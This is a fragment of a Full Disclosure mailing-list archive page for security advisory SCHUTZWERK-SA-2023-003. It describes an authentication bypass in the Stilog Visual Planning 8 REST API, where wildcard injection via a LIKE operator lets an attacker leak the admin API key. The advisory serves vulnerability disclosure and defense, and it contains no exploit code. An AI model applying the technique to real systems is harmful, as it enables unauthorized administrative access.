An authentication bypass vulnerability was found in Stilog Visual Planning 8. It allows an unauthenticated malicious user to receive an administrative API token.
A wildcard injection inside a prepared SQL statement was found in an undocumented Visual Planning 8 REST API route The combination of fuzzy matching (via LIKE operator) and user-controlled input allows exfiltrating the REST API key based on distinguishable server responses If exploited, attackers are able to gain administrative access to the REST ...
<!--X-Body-Begin-->
<!--X-User-Header-->
Full Disclosure
mailing list archives
<!--X-User-Header-End-->
<!--X-TopPNI-->
By Date
By Thread
</form>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
SCHUTZWERK-SA-2023-003: Authentication Bypass in Visual Planning REST API
<!--X-Subject-Header-End-->
<!--X-Head-of-Me ...